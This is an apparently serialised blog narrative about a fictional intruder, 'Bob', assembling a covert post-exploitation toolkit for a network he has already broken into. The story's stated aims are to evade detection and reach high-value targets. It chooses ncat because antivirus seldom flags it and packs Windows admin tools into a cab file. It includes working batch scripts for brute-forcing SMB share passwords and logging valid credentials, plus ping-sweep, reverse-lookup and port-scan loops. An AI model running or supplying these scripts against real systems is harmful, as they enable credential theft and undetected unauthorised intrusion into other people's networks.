Bob Prepares For Action

Previously in Bob land.......



Bobs back and he's been thinking about his new playground. He's realised that if he's not careful he'll attract attention and get into trouble, so he needs to lay down some ground-rules and define some goals before he goes back on the Wallifords network. If he's going to get the maximum benefit from Wallifords as a training ground rather than a playground he needs to get serious and stop recklessly throwing exploits at any old box.

Goal 1
To extract as much information about the Walliford Network as possible.

Goal 2
To identify high value targets and gain access to those systems.

Goal 3
To remain undetected.

Goal 4
To generally have fun, learn his tools and practice his techniques.


Pretty simple goals eh. Bob knows that to remain undetected he's going to have to use as many tools that are already on the compromised host as he can. He knows that he needs to use as many legitimate tools as possible and only upload those that won't be detected by AV.

Getting his tools onto the compromised hosts is important, but uploading them one by one is a pain in the arse. Then Bob remembers something he heard in a great presentation on post exploitation from Dean Der Beer, a reference to a tool called Metacab. He takes a look at Metacab but decides against using it. Bob really likes the idea of Metacab but he wants a different set of tools so he goes about making his own version. Using the Makecab tool already in XP he creates a cab file containing the few additional tools he needs, knowing he can upload and extract the files from the cab with native windows tools from straight from the command-line.

The one tool he cannot do without is netcat but AV picks it up quite easily. Then Bob remembers that his Nmap directory has ncat, a new version of netcat with loads of additional features. Bob runs it through virustotal to see what gives.



Perfect, only detected by one AV product out of 41. Now Bob knows that he can use this tool for file transfer, creating proxies and even backdoors. Many of the other tools he decides to include in the cab file come from the Windows Resource Kit. This means that there is very little chance of them being detected by AV or looking like Potentially Unwanted Applications (PUA) on the host.


Tools List

cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
ncat.exe
net.exe
ngrep.exe
pmon.exe
PortQry.exe
reg.exe
srvinfo.exe
WinDump.exe

As expected VirusTotal finds nothing wrong with his other tools, but then again why would it.

So looking at his tools Bob has his ncat for backdoors and file transfer, he has a port scanner, pmon for keeping an eye on his hosts CPU and memory, tools for extracting anything out of Active Directory, packet sniffers, SrvInfo which is great for looking at details of servers. He also includes a couple of standard tools such as Net.exe and Cmd.exe which are there just encase they had been removed by the Sys Admin. Hopefully he's got everything he needs for a successful expedition into the Walliford Fries network. If not, he'll go back to the drawingboard and create a new cab file.

Bob also creates a few bat files that he can use for scanning and password checks. It's easier to create these now and include them in the cab than it is to write them on the fly.

His first bat file is a simple bruteforce script that will use in-built windows functions to bruteforce shares. He'll supply a userlist (names.txt) and a common password list (words.txt) to the bat file. The password list will be common passwords and can be tweaked using the inbuilt DOS Edit tool when he's on the target, and the userlists will be generated from his enumeration tool dsquery . After running the bruteforce script any succesfull logins will be saved to a text file (creds.txt). Bob knows from performing password audits in his other life that even when complex passwords are enforced users will still pick dumb complex passwords, such as Password01. And when it comes to change it......well of course were looking at Password02!

Before any bruteforcing is done Bob will be checking the password policies so he doesn't trip any account lockout thresholds. So if the account lockout policy triggers after 3 incorrect attempts in half an hour he'll just try 2 common passwords on all accounts. As they say, slow and steady wins the race.

Set /P target="Enter Target To Perform BF on:"
For /F %%i in (names.txt) do @(for /f %%j in (words.txt) do @echo %%i:%%j & @net use \\%target% %%j /u:%%i 2>nul && echo %%i:%%j >> ./creds.txt && net use \\%target% /del)

Bob will use the either net.exe or dsquery.exe to populate his names.txt file. Dsquery is fantastic for ripping through Active Directory and if you know what your doing you can use them to pretty much find out anything about users and computers. The beauty is, these tools can be run from any user account, so you don't need to pop an admins box to get some juicy info.

The next bat file that bob will include is to check for hosts that respond to a ping and output the results to a file.

set /P subnet="Enter subnet:"
for /L %%i in (1,1,255) do @ping -n 1 -w 1 %subnet%.%%i | find "Reply"


Another bat file is created to perform reverse lookups using a nslookup FOR loop.

set /P subnet="Enter subnet:"
For /L %%i in (1,1,255) do @nslookup %subnet%.%%i 2>nul | find "Name" && echo %subnet%.%%i



And finally a bat file to use the Portqry tool for port scans against hosts in a host file (hosts.txt). Again he can use dsquery or net.exe to populate the hosts file.

For /F %%i in (hosts.txt) do @PortQry.exe -n %%i -o 21,22,23,25,80,139,445,3389,1433 -p tcp

Ok, that'll do for now. Bob builds his ddf file for his cab file and creates the cab.

;*** MakeCAB Directive File for bin
;
.OPTION EXPLICIT ;*** Generate errors
.Set MaxCabinetSize=0
.Set MaxDiskSize=0
.Set CabinetNameTemplate=bin.cab
.set DiskDirectoryTemplate=CDROM ;
.Set CompressionType=MSZIP ;
.Set UniqueFiles="OFF"
.Set Cabinet=on
.Set DiskDirectory1=bin bf.bat
cmd.exe
dsadd.exe
dsget.exe
dsquery.exe
edit.com
hosts.txt
names.txt
ncat.exe
net.exe
ngrep.exe
pingsweep.bat
pmon.exe
port-scan.bat
PortQry.exe
reg.exe
rev-lookup.bat
srvinfo.exe
WinDump.exe
words.txt
;*** EOF



And to build his super duper cab, he makes sure all the tools, bat files and the bin.ddf file is in the same directory and.....

makecab /F bin.ddf



Perfect, after building his cab file it comes in at less than 1MB, Bob honestly couldn't be happier. He'll have to use the windows built-in tool called Expand.exe to get his files out of the cab.

expand /F:* bin.cab .




Right with that done Bob is almost ready to hop onto his target and put his tools to good use and start his network exploration.



Bob Builds His Custom Payloads - Part 4 .......coming next